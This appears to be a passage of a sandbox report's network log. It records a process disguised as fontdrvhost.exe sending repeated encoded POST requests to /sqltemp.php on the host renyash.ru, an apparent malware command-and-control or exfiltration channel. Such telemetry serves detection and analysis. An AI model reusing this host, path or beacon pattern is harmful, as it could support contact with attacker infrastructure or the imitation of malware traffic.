Jan 1, 2025 14:52:22.651901960 CET	1012	OUT	Data Raw: 56 53 5a 56 54 5a 51 57 58 56 52 59 56 5d 59 52 5b 5e 54 51 55 59 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VSZVTZQWXVRYV]YR[^TQUYP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X'?#?"$.,%!-;(T=.4[41,(]:$//9&Y.,Y-1
Jan 1, 2025 14:52:22.749231100 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:23.024743080 CET	803	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qc0AAov6ukQWtLzsVMJeFi%2BG5pjD7AS1XeYkA03cknl1B9MDmZVv9tui7%2Byp6947Uqd8NLER2jgBbWBFNlDGPY893C0FST62r9ePtDmDwwXOG1ZgxOeX4wb90NlOIKhg0wu43Pet"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd4de8f4c420-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8063&min_rtt=1487&rtt_var=13710&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=26988&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49769	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:23.150538921 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:23.495640039 CET	1012	OUT	Data Raw: 56 53 5f 5d 54 5f 54 51 58 56 52 59 56 5c 59 56 5b 53 54 5e 55 5b 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VS_]T_TQXVRYV\YV[ST^U[PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3<" Y9$?.).4+)>+42Z?;>%7S::&Y.,Y-5
Jan 1, 2025 14:52:23.624933004 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:23.880774021 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=41mXtcxDQxYfXXwDfvUxSs3jX%2Bu1VPNwX8wrF2Bt1wrJIwDDNQR26D7p7FgWCp%2BtM6KynzzwMTmJgf9OLwqEMQGwbhRUkJBiDT1KQb1xSJBksf3owN4ZeNyPG%2B7CDjb%2F2NBuVRjH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd535a717c9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4838&min_rtt=1972&rtt_var=6473&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=58620&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49770	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:24.029736042 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:24.387021065 CET	1012	OUT	Data Raw: 56 54 5a 54 54 5c 54 53 58 56 52 59 56 58 59 54 5b 5f 54 5e 55 5b 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VTZTT\TSXVRYVXYT[_T^U[P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X$*7,%3>,:#-+:(>>,]7(+8>& ::&Y.,Y-%
Jan 1, 2025 14:52:24.474194050 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:24.744895935 CET	807	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CPduo5hJKKMP1zIG7qzEe2Cc5%2FnMwrRgbflLDCv6vK1bAyv0%2FKeVOTnU%2BkQee1dk8ComJtJ8oug43oC7lqTiFxSnrpQnh78Azm9kJATDXd%2BpaVktuGOTc25oECqQZZBgFfaOhErf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd58accf42c2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2316&min_rtt=1713&rtt_var=1850&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=223139&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49771	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:24.870827913 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:25.230000019 CET	1012	OUT	Data Raw: 56 50 5f 54 54 50 54 5d 58 56 52 59 56 5b 59 56 5b 5b 54 59 55 5d 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VP_TTPT]XVRYV[YV[[TYU]P^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&?\"<%$>,=V7;?'S=-##T3X+A1/'V-:&Y.,Y-)
Jan 1, 2025 14:52:25.328108072 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49772	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:25.329962015 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:25.683173895 CET	1852	OUT	Data Raw: 56 57 5f 53 54 5c 51 55 58 56 52 59 56 5c 59 5e 5b 5c 54 5c 55 5a 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VW_ST\QUXVRYV\Y^[\T\UZPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z09X 9_'';U 0X?8>X [ "0<8)A%'R:&Y.,Y-5
Jan 1, 2025 14:52:25.802619934 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:26.072232962 CET	951	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=he7EuNINwZPcruON5F2WNbwkGSUNZgAVUN48PknnoRLXJ17iyFf5yxCti3bTjqat%2BfREyQPp8ebKjIkSUFksSqtAd63Q6XRGB8201UzMHYWHBHBBB9IWw2CcZnPX6siiS61tAvv%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd60ffc8727a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4362&min_rtt=2052&rtt_var=5390&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=71101&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 25 51 2a 5b 32 13 25 54 30 5c 3f 3d 3b 55 25 2d 29 00 29 3b 26 58 24 00 0e 02 2a 3a 3f 59 20 2c 0c 06 25 5e 33 02 21 2d 37 58 25 34 2b 59 05 1c 23 1d 36 2f 2c 1c 29 2d 0e 04 32 3f 03 5a 27 00 34 59 3c 16 30 11 37 28 2f 5f 24 3d 30 11 29 5c 3c 56 24 2f 2b 14 2d 3c 21 1d 27 10 2c 54 00 11 26 1d 24 08 24 16 34 0e 30 59 22 31 3d 13 32 0a 3e 57 24 3c 09 53 37 07 25 05 26 22 2b 10 23 33 31 07 25 2b 31 10 23 04 37 52 3e 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%Q[2%T0\?=;U%-));&X$:?Y ,%^3!-7X%4+Y#6/,)-2?Z'4Y<07(/_$=0)\<V$/+-<!',T&$$40Y"1=2>W$<S7%&"+#31%+1#7R>%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49773	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:25.448699951 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:25.792789936 CET	1012	OUT	Data Raw: 56 52 5f 55 51 5a 51 50 58 56 52 59 56 5f 59 50 5b 53 54 51 55 59 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VR_UQZQPXVRYV_YP[STQUYP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._3,942$=7E,:R!>8+0*>8Z#"[+$,?:&Y.,Y-9
Jan 1, 2025 14:52:25.921072006 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:26.185583115 CET	799	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ivNt1JDBXZuunOjOIrPqEnZ1LVIKijQEmEBRkOWUKKlPBXTYVRdX5xC7DcDcxymuuGh8gtRaJbWU5XlfKMjhhvQUBqJqyVn3USBOjPnyFtl10zZZhL8TBOehhvXI9XCwyGzs39fi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd61baf2726b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3199&min_rtt=2002&rtt_var=3145&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=126090&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49774	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:26.307028055 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:26.651985884 CET	1012	OUT	Data Raw: 53 50 5a 53 54 5d 54 51 58 56 52 59 56 51 59 50 5b 58 54 5c 55 5b 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SPZST]TQXVRYVQYP[XT\U[PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&<:#Y"%.#B,9: (Y<'(-<Y 4++%?V.&Y.,Y-
Jan 1, 2025 14:52:26.779622078 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:27.036976099 CET	805	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TK9DYTExPU5n3mAbF1lh%2BNq5MtHANUm4%2Bv52t4HupZEzJItHwEQq3XFtyMArGx622evT3r2lVutGApw2gnbiH%2BEdtgRKyaaoHmZuE44Fzn10T6o6C649k9AiXLoycA17KtzHdQYT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd67097632dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3241&min_rtt=1927&rtt_var=3351&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=117335&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49775	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:27.166116953 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:27.511488914 CET	1012	OUT	Data Raw: 56 5f 5a 56 51 5d 54 5d 58 56 52 59 56 58 59 57 5b 59 54 58 55 59 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V_ZVQ]T]XVRYVXYW[YTXUYPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'/5["?%.+E;*= 3(4=-4] <])A&+,:&Y.,Y-%
Jan 1, 2025 14:52:27.641555071 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:27.899215937 CET	802	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1IQ6pa1oAMrDWJOV4%2F2vndh6X2nfkPKE8hZm0KAXViq2%2BfsVj7VFN7NZ3UGR%2BewJuYvyaVo07mX%2FHzrSlBvf2wMmfgVU9zz2xrZMdwGGhzWfDSBuLc9Y5KkepyXcSsR1jG3iZaGm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd6c78aa41d5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6658&min_rtt=1769&rtt_var=10442&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=35711&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a Data Ascii: 42W\X
Jan 1, 2025 14:52:27.991584063 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49776	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:28.120573044 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:28.480319023 CET	1012	OUT	Data Raw: 56 54 5f 54 54 5a 51 52 58 56 52 59 56 5c 59 54 5b 52 54 58 55 5e 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VT_TTZQRXVRYV\YT[RTXU^PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$&7>'-7D8!S 0X+94=-+4<;9@%Y?W9&Y.,Y-5
Jan 1, 2025 14:52:28.564743996 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:28.839664936 CET	805	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hg5Miv9koOI6Pe0jN4jUQATT8V53TJkzbmNjVW%2BTIKgCnPlCWvo%2BUrUKstIyJWuImS0U51tK8eCojQR%2BoxkQA2wU8MXn4zzIJmjVhQTRKBzaBK0gg02nGyWY0wqTQrqPpyIWoamY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd724b044229-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2708&min_rtt=1759&rtt_var=2559&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=156032&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49777	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:28.966810942 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:29.323834896 CET	1012	OUT	Data Raw: 56 51 5a 57 54 5b 54 50 58 56 52 59 56 50 59 50 5b 53 54 5d 55 5e 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQZWT[TPXVRYVPYP[ST]U^PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3)\ /=_$;B/!=#<_'U);4$+(:%+S.*&Y.,Y-
Jan 1, 2025 14:52:29.449487925 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:29.710602045 CET	818	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZhYsnIl%2FNYgH%2B8kBGrF1WSSLDrD3vMQYSTvq5Sj6FOg356r8NUkVlpD72NMSiVGRP%2FG%2BLRhNpsLps2oq0%2BtgaegMs5IeYF7D6B1jloH6qoVChqn76S%2B%2Bxf%2Bv%2FFAlxGOAqGm4i%2FRv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd77bbad4397-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3301&min_rtt=1729&rtt_var=3793&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=102040&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49778	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:29.837430000 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:30.183309078 CET	1012	OUT	Data Raw: 53 50 5f 54 54 51 54 5d 58 56 52 59 56 58 59 53 5b 5b 54 5e 55 5f 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SP_TTQT]XVRYVXYS[[T^U_PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3?>4?-0'B8927$(_'R)' !,?(61?7U9&Y.,Y-%
Jan 1, 2025 14:52:30.291994095 CET	25	IN	HTTP/1.1 100 Continue
